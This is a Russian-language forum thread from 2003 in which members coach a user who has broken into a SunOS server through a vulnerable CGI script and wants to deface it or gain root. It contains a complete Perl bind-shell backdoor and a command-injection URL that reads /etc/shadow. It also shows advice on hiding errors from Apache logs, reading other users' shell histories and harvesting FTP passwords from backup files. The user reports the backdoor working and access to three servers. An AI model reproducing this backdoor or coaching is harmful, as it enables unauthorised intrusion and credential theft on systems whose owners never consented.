> А обязательно ли компилить эксплоиты на удаленном серваке? > Можно ведь это сделать у себя, а потом закачать туда? у > меня такое чувство, что gcc или там нету, или прав не > хватает:(
Наверное можно и у себя скомпилить. Но для этого твой gcc должен поддерживать кросс-компиляцию с target=SunOS 5.7 . Но это все AFAIK. Если кто знает точнее - поправьте плз. Спроси про это в programming.
Получил доступ юзера на серваке под управлением SunOs, хочу дефейснуть, но перед этим хотелось бы узнать:
1) Какой командой можно узнать историю команд
2) Список процессов? "ps" не работает...
3) Апач запущен от имени того пользователя(!), с чьими правами я сижу, но где этот апач, непойму, где найти его логи?
4) И вообще, когда я даю команду ls -al применительно к какой-нибудь директории, все происходит не как обычно на linux:
мне выдается просто список в столбик без прав доступа, владельцев и пр. Как же так?
4) Существуют ли эксплоиты для данной оси, хотелось бы, конечно, зарутить, чем дефейсить и потерять завтра же этот сервак :)
[Unix] Несколько вопросов к SunOs 5.718.09.03 17:50 Автор: NKritsky <Nickolay A. Kritsky> Статус: Elderman
> Получил доступ юзера на серваке под управлением SunOs, хочу > дефейснуть, но перед этим хотелось бы узнать:
0. Дефэйс - это плохо.
> > 1) Какой командой можно узнать историю команд
какой шелл юзаешь?
> 2) Список процессов? "ps" не работает...
что значит не работает? Как ты его запускал? Что получил в ответ? Читал ли `man ps'
> 3) Апач запущен от имени того пользователя(!), с чьими > правами я сижу, но где этот апач, непойму, где найти его > логи?
Апач может быть где угодно. /www /apache /httpd Плюс то же самое в каталогах /export , /sfw , /opt ,/usr ,/usr/local . А логи он скорее всего складывает куда-нибудь в /var.
> 4) И вообще, когда я даю команду ls -al применительно к > какой-нибудь директории, все происходит не как обычно на > linux: > мне выдается просто список в столбик без прав доступа, > владельцев и пр. Как же так?
это странно, на 5.8 и 5.9 ls -al работал нормально. Почитай `man ls' , попробуй сделать 'ls -al >resultfile` и посмотреть на этот файл у себя. Может там проблема с шириной колонки?
> 4) Существуют ли эксплоиты для данной оси, хотелось бы, > конечно, зарутить, чем дефейсить и потерять завтра же этот > сервак :)
> какой шелл юзаешь? да наверное bash, дело в том что я даже tty не имею. Исполняю команды благодаря некоему дырявому скрипту.
И как в этом случае поглядеть историю команд?
> 2) Список процессов? "ps" не работает... пардон, работает, там ключи другие ;)
> 4) И вообще, когда я даю команду ls -al применительно > к > > какой-нибудь директории, все происходит не как обычно > на > > linux: > > мне выдается просто список в столбик без прав доступа, > > владельцев и пр. Как же так? > > это странно, на 5.8 и 5.9 ls -al работал нормально. Почитай > `man ls' , попробуй сделать 'ls -al >resultfile` и > посмотреть на этот файл у себя. Может там проблема с > шириной колонки? Нет никакой проблемы, man ls точно такой же что и , например, в asplinux. Но выводитсятолькосписок файлов, странно...
[Unix] и еще...23.09.03 09:05 Автор: Hux0r Статус: Незарегистрированный пользователь
У меня опыта в этом собственно нет, и я хотел бы узнать как забиндить порт на этом серваке, чтоб нормально к нему прителнетится.
например, залил я на сервак скрипт такого содержания:
#!/usr/bin/perl
$shell = "bin/bash -i"; #
$Port = "55";
$Protocol = getprotobyname("tcp");
use Socket;
socket (S, &PF_INET(), SOCK_STREAM(), $Protocol|die "Cant create socket\n");
setsockopt(S, SOL_SOCKET, SOREUSEADDR,1);
bind (S, sockaddr_in($Port, INADDR_ANY))|die "Cant open port\n";
listen (S,3)|die "Cant listen port\n";
while(1)
{
accept(CONN, S);
if(! ($pid=fork))
{
die "Cannot fork\n" if (! defined $pid);
open STDIN,"<&CONN";
open STDOUT,">&CONN";
open STDERR,">&CONN";
exec $shell|die print CONN "Cant exec $shell\n";
close CONN;
exit 0;
}
}
---
пытаюсь запустить его:
perl /home/www/cgi-bin/backdoor.pl
никакого эффекта, процесса такого не создается.
путь указанный в заголовке скрипта к перлу совпадает с истинным.
perl запускать имею право:
-rwxr-xr-x 2 root root 527888 Aug 10 2000 perl
Что я сделал неправильно?
[Unix] Есть подозрение, что ты оказываешься в каком-то неправильном окружении.23.09.03 09:31 Автор: Ktirf <Æ Rusakov> Статус: Elderman
> пытаюсь запустить его: > perl /home/www/cgi-bin/backdoor.pl > никакого эффекта, процесса такого не создается. А если stdout и stderr перенаправить в netcat (кстати, netcat там есть?) и посмотреть, о чем ругается?
Фишки навроде "кривого" ls могут быть, если ls - это алиас. Вообще, установкой "странного" окружения можно добиться удивительных вещей ;)
[Unix] как перенаправить stderr?23.09.03 13:14 Автор: Hux0r Статус: Незарегистрированный пользователь
> А если stdout и stderr перенаправить в netcat (кстати, > netcat там есть?) и посмотреть, о чем ругается? netcat есть
А как перенаправить stderr в неткат или к себе на консоль?
[Unix] some info23.09.03 09:26 Автор: NKritsky <Nickolay A. Kritsky> Статус: Elderman
1. По поводу истории команд. Я кажется понял - ты хочешь посмотреть не свою историю команд, а чью-то?
Если ты хочешь посмотреть чью-то историю команд, то ты должен выяснить какими шеллами он может пользоваться ( самый простой способ - `grep $username /etc/passwd' ) , прочитать ман к соответствующему шеллу, и действовать как написано в мане.
2. По поводу дырявого скрипта.
NB! Товарищ, помни о stderr!
Если ты выполняешь команды через дырявый перловый скрипт который делает open() с твоим аргументом, помни что в пайп попадет только stdout. А stderr пойдет в error_log апача. Поэтому если ты сделаешь что-то вроде href="http://victim.org/cgi-bin/cart.pl?template=/bin/cat%20/etc/shadow target=_blank rel="nofollow">http://victim.org/cgi-bin/cart.pl?template=/bin/cat%20/etc/shadow| то ты не увидишь надписи "/etc/shadow: permission denied ". Но и пасс-файла не увидишь.
3. Теперь о твоем скрипте. Во-первых замени все die на print();exit; (см. п.2). Во-вторых, ты пытался запустить этот скрипт на своей системе? Если да, то спрошу, ты пытался запустить этот скрипт на своей системене_из_под_рута? Ты ж там 55-й порт байндишь!!!
4. По поводу ls -al. Я не знаю почему он не работает. Когда зарутишь сервак, расскажешь нам в чем было дело. Команду ls -al можно заменить командой find с необходимыми аргументами. Необходимые аргументы оставляю найти тебе самому.
[Unix] some info23.09.03 10:55 Автор: Hux0r Статус: Незарегистрированный пользователь
> 1. По поводу истории команд. Ок, нашел хистори, спасибо. /home/root/.bash_history
> 2. По поводу дырявого скрипта. > NB! Товарищ, помни о stderr! Да, теперь я понял ;)
> 3. забиндил 30002 порт, работает! шайтан.
правда с фтп-шными паролями которые я успешно нашел в bak-ах (теперь у меня есть доступ по фтп для некоторых юзеров) не залогинишся ;(
Пойду эксплоиты искать... Может где-нибудь есть у Вас ссылочки, а?:)
[Unix] some info23.09.03 11:39 Автор: NKritsky <Nickolay A. Kritsky> Статус: Elderman
> забиндил 30002 порт, работает! шайтан. > правда с фтп-шными паролями которые я успешно нашел в > bak-ах (теперь у меня есть доступ по фтп для некоторых > юзеров) не залогинишся ;( > Пойду эксплоиты искать... Может где-нибудь есть у Вас > ссылочки, а?:)
Ссылочки у нас простые - www.google.com :)
Если есть терпение, можешь сам попробовать написать эксплойт. Я сейчас как раз пытаюсь написать. Сделаю, дам тебе на тестирование. Если сделаю :-(
[Unix] по эксплоитам23.09.03 11:54 Автор: Hux0r Статус: Незарегистрированный пользователь
> Ссылочки у нас простые - www.google.com :) > Если есть терпение, можешь сам попробовать написать > эксплойт. Я сейчас как раз пытаюсь написать. Сделаю, дам > тебе на тестирование. Если сделаю :-(
А обязательно ли компилить эксплоиты на удаленном серваке? Можно ведь это сделать у себя, а потом закачать туда? у меня такое чувство, что gcc или там нету, или прав не хватает:(
[Unix] Кросс-Компиляция23.09.03 14:45 Автор: NKritsky <Nickolay A. Kritsky> Статус: Elderman
> А обязательно ли компилить эксплоиты на удаленном серваке? > Можно ведь это сделать у себя, а потом закачать туда? у > меня такое чувство, что gcc или там нету, или прав не > хватает:(
Наверное можно и у себя скомпилить. Но для этого твой gcc должен поддерживать кросс-компиляцию с target=SunOS 5.7 . Но это все AFAIK. Если кто знает точнее - поправьте плз. Спроси про это в programming.
[Unix] Все правильно сказал, нужно либо иметь у себя SunOS 5.7, либо кросскомпилировать.23.09.03 14:56 Автор: Ktirf <Æ Rusakov> Статус: Elderman
Еще такой вопрос, из удаленной консоли возможно ли узнать какие порты сейчас открыты?
И вообще как узнать ip сервака? (дурацкий может быть вопрос)
Имени сервака (через hostname) кажется нет в базе dns, немогу ip определить.
> Еще такой вопрос, из удаленной консоли возможно ли узнать > какие порты сейчас открыты? Может там на машине еще и nmap найдется? :) А если серьезно, то netstat'ом, конечно.
> И вообще как узнать ip сервака? (дурацкий может быть > вопрос) > Имени сервака (через hostname) кажется нет в базе dns, > немогу ip определить. Например, попытаться установить соединение с той машиной, за которой сидишь, и посмотреть, откуда идет соединение.
> серьезно, то netstat'ом, конечно. да, круто, теперь я не слепой ;)
> Например, попытаться установить соединение с той машиной, > за которой сидишь, и посмотреть, откуда идет соединение. логично, попробую
ipconfig -a не работает, прав видать не хватает
Я может уже достал своими вопросами, но как перенаправить stderr (когда я пользуюсь дырявым скриптом) ко мне на экран а не в err-log апача?
[Unix] да на здоровье.26.09.03 09:26 Автор: NKritsky <Nickolay A. Kritsky> Статус: Elderman
ifcgonfig -a
f а не p - ты ж не в CHICAGO, моя дорогая. :-)
> Я может уже достал своими вопросами, но как перенаправить > stderr (когда я пользуюсь дырявым скриптом) ко мне на экран > а не в err-log апача?
Попробуй написать свой дырявый скрипт, который будет подхватывать stderr. И залей туда через существующий.
Как написать такой скрипт я тебе говорить не буду - пошевели немного мозгом - книжку почитай по перлу, по шеллу.
[Unix] да какое уж там здоровье )26.09.03 09:37 Автор: Hux0r Статус: Незарегистрированный пользователь
> ifcgonfig -a > f а не p - ты ж не в CHICAGO, моя дорогая. :-) Ну описался я, подумаешь:)
ipconfig -a конечно, но не отрабатывает с правами nobody, причем на многих серваках (у меня таких три :))
> Попробуй написать свой дырявый скрипт, который будет пишу.
[Unix] Странно...26.09.03 09:43 Автор: NKritsky <Nickolay A. Kritsky> Статус: Elderman
# id -a
uid=60001(nobody) gid=60001(nobody) groups=60001(nobody)
# ifconfig -a
lo0: flags=1000849<UP,LOOPBACK,RUNNING,MULTICAST,IPv4> mtu 8232 index 1
inet 127.0.0.1 netmask ff000000
eri0: flags=1004843<UP,BROADCAST,RUNNING,MULTICAST,DHCP,IPv4> mtu 1500 index 2
inet <skipped>
---
Вроде все работает.
[Unix] руки у меня однако кривые26.09.03 10:01 Автор: Hux0r Статус: Незарегистрированный пользователь
подробно о проекте
Анализ криптографических сетевых...
новое сообщение
закрытая нитка
новое сообщение
в закрытой нитке
старое сообщение
